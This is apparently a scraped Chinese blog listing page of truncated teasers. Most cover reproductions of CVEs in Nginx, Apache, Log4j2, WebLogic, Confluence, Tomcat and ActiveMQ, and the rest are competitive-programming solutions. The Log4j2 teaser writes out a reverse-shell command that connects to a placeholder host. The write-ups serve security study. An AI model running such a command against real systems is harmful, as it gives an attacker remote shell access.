2018 2894 cve

# Nginx文件名逻辑漏洞复现CVE-2013-4547 ## 前置知识 本次针对的是中间件Nginx `Nginx是什么?` > Nginx（发音为“engine-x”）是一个高性能的开源Web服务器软件。它以异步事件驱动的方式处理客户端请求，具有占用资源 > 少、处理并发连接能力强和稳定性高等 ......

# Apache HTTPd换行解析漏洞复现CVE-2017-15715 ## 漏洞利用 `漏洞利用条件` > Apache: 2.4.0~2.4.29 > > 实际存到后端时的文件名可控 `漏洞利用方式` > bp中更改存放到后端的文件名 > > 假设 > > ``` > 原文件名为"evil.p ......

先考虑暴力 **dp**。设 $f_{u,x}$ 表示在子树 $u$ 中选出的节点集合的 $w$ 最小值为 $x$ 的情况下，最大的节点集合的大小。有两种转移（选不选 $u$）： $f_{u,x}\gets \sum\limits_{v\in \text{substree}_u} f_{v,\ge ......

# 题目 农夫约翰有一块很大的田，他正在考虑种甜玉米。经过对他农田的调查，FJ发现它形成了一个（N-1）×（N-1）的 正方形。西南角为坐标（0,0），东北角是（N-1，N-1）。在某些整数坐标的位置中有双头喷头，每一个都能够同 时喷洒水和肥料。一个在（i，j）处的双头喷头会将水洒在农田中所有在其东 ......

# Apache Flink目录遍历漏洞复现CVE-2020-17519 ## 前置知识 `Apache Flink:` > Apache Flink 是一个框架和分布式处理引擎，用于在*无边界和有边界*数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行，并能以内存速度和任意规模进行计 ......

[link](https://www.luogu.com.cn/problem/P4809) 大概是 oi 生涯目前最无聊的时候写的最~~啰嗦~~详细的题解。 #### 题目描述 给定一个 $n\times m$ 的点阵和两类边，第 $i$ 行 $j$ 列的城市我们叫祂城市 $(i,j)$。 横边： ......

# __wakeup()魔术方法绕过（CVE-2016-7124） ## 漏洞简介 在php反序列化数据过程中，如果类中存在__wakeup方法，调用 unserilize() 方法前则先调用__wakeup方法，当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 ......

# Nginx 文件名逻辑漏洞（CVE-2013-4547）(Vulhub) ## 漏洞简介 在Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本中存在错误解析用户请求的url信息，从而导致文件代码执行，权限绕过等问题。 ## 适用环境 Nginx 0.8.41 ~ 1.4 ......

记 $f_n$ 为 $k=0$ 的答案。则有答案为 $\binom n k ^2 2^k k! f_{n-k}$。接下来的问题变为怎样对每个 $n,k$ 求出 $f_{n-k}$。 **组合意义** 以下记 $\overline{A}$ 为 $A$ 的情侣。 欲求 $f_n$，不妨设第一排坐的两个人 ......

访问靶场界面，发现并无明显注入点，注册个账号试试。 账号密码就随意写，能登陆就可以 然后登录进入后台 然后根据靶场提示，是在welcome.php处发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞，于是第一反应就是在q=1这个参数进行尝试，但是发现没有结果 继续查 ......

仅供技术学习和参考交流，请勿用于违法行为！！！！！！ 本文对Apache log4j2（CVE-2021-44228)进行漏洞复现，Apache Log4j2是一个基于Java的日志记录工具，2021年12月9日爆出Log4j2组件在处理程序日志记录时存在JNDI注入漏洞,掀起了不小风浪。 工具： ......

[P4607 [SDOI2018] 反回文串](https://www.luogu.com.cn/problem/P4607) 每次给出 $n,k,p$，求出长为 $n$ 的回文串以及其旋转变换的总数，且字符集大小为 $k$，答案对 $p$ 取模。 $T\le 10$，$n\le 10^{18}$， ......

在2018年的一个寒冷的冬天，我踏入中国的某个偏远乡村，眼前是一片石灰窑工厂的废墟。这些曾经烟囱冒烟的工厂，现在都静悄悄的，好像时间在此刻停止。这是当年中国政府加强环境保护措施的结果，众多不达标的石灰窑被迫关停。 #### **为何石灰窑成为关停的对象？** 石灰窑（lime kilns）是一种用于 ......

理解题目画了一个二叉树，然后思维定势让我想构建一个有n层的二叉树，然后统计叶子节点。。有点恐怖。 但是正解是考虑每一个箱子对答案的贡献。 图片来自take_baymax520的博客 对于每个箱子，它要发生交换也就是为答案贡献的条件是它当前宝石大小小于它的大小。对于比它小的宝石之前取(pi)或不取(1 ......

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称：Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628） 编号：CVE-2018-2628 原理： 应用：Webl ......

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞复现 - FreeBuf网络安全行业门户 1、介绍 名称：weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) 编号：CVE-2017-10271 原理：Weblogic的WLS Se ......

[原题传送门](https://www.luogu.com.cn/problem/P9507) ## 题目描述 Ghiță 有一个下标从 $0$ 开始的正整数序列 $S$。因为他是喀尔巴阡的国王，所以他想要构造一个节点编号为 $0,1,\ldots ,N-1$ 的二叉树，满足： - 树的中序遍历按节 ......

[原题链接](https://www.luogu.com.cn/problem/P5952 "原题链接")\ ## 题目大意 $有一个高度为H的水箱，里面有n*m个格子，每两个相邻的格子之间有一个隔板，问水位总共有多少中可能的情况，对10^9+7取模$ ### 数据范围 $1\le n*m\le 5 ......

# 铁人三项(第五赛区)_2018_rop 经典ret2libc3  exp ``` ......

### Apache HTTPD 换行解析漏洞（CVE-2017-15715）【项目中遇到】 Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页，其**2.4.0~2.4.29**版本中存在一个解析漏洞，在解析PHP时,**1.php\x0A将按照PHP后缀进行解 ......

## 题目描述 小 A 被选为了 ION2018 的出题人，他精心准备了一道质量十分高的题目，且已经把除了题目命名以外的工作都做好了。 由于 ION 已经举办了很多届，所以在题目命名上也是有规定的，ION 命题手册规定：每年由命题委员会规定一个小写字母字符串，我们称之为那一年的命名串，要求每道题的名 ......

# P4426 [HNOI/AHOI2018] 毒瘤 题解 非常好虚树题目，融合了容斥的内容。 ## 简化题意 给定一张 $n$ 个点、$m$ 条边的图，求图的独立集个数。其中 $n \leq 10^5$，$n-1 \leq m \leq n+10$。 独立集：对于图 $G(U, E)$ 的一个点集 ......

题目传送门：[Click](https://www.luogu.com.cn/problem/P4795)。 蒟蒻看见这道题，想了足足一个小时，过后顿有所悟，故作此篇。 首先，看到题目，光是数据就已经达到了 $\operatorname{O}(nm)$ 的级别，再看一看数据范围：$3 \leq n, ......

上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的，接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得，从中收获到自己独特的见解。 ......

> 文章写于2021-11-29，首发在[天融信阿尔法实验室](https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA) ## 前言 安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hac ......

### Aapache Tomcat AJP 文件包含漏洞（CVE-2020-1938）【项目中遇到过】 **1. 背景简述** java是目前WEB开发中主流的编程语言，而Tomcat是当前流行的Java中间件服务器之一。 Ghostcat（幽灵猫）是由长亭科技安全研究员发现的存在于 Tomcat ......

### ActiveMQ任意文件写入漏洞（CVE-2016-3088）【现实项目遇到过】 **1. 环境搭建** ```sh cd vulhub-master/activemq/CVE-2016-3088 docker-compose up -d docker-compose config #查看靶 ......

漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......

# Confluence OGNL表达式注入命令执行漏洞（CVE-2022-26134） ## 简介 Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需 ......

[Link](https://www.luogu.com.cn/problem/P5022) 因为是道NOIP，那么我们不妨按照考场上的策略一点一点想。 先看部分分，有一档有很明显的特征 $n=m-1$ 这显然构成一棵树，对于一棵树，我们想把他按照题目的要求遍历完，一定是像dfs的遍历顺序一样，对于 ......